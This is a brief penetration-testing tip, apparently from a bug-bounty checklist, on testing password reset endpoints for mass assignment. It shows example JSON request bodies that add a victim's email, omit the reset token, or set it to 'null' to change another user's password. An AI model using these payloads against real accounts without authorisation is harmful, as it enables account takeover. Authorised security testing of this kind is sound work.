Mass assignment in password resets

In a password change/reset request, try adding additional parameters to change other users’ passwords.

For example, if a normal password change request includes the following parameters:

{ "token": "abc123", "password": "newPass123" }

Try adding a username or email:

{ "token": "abc123", "password": "newPass123", "email": "victim@target.com" }

If this works to change the other user's password, also try to send the request without a token:

{ "password": "newPass123", "email": "victim@target.com" }

Or:

{ "token": "null", "password": "newPass123", "email": "victim@target.com" }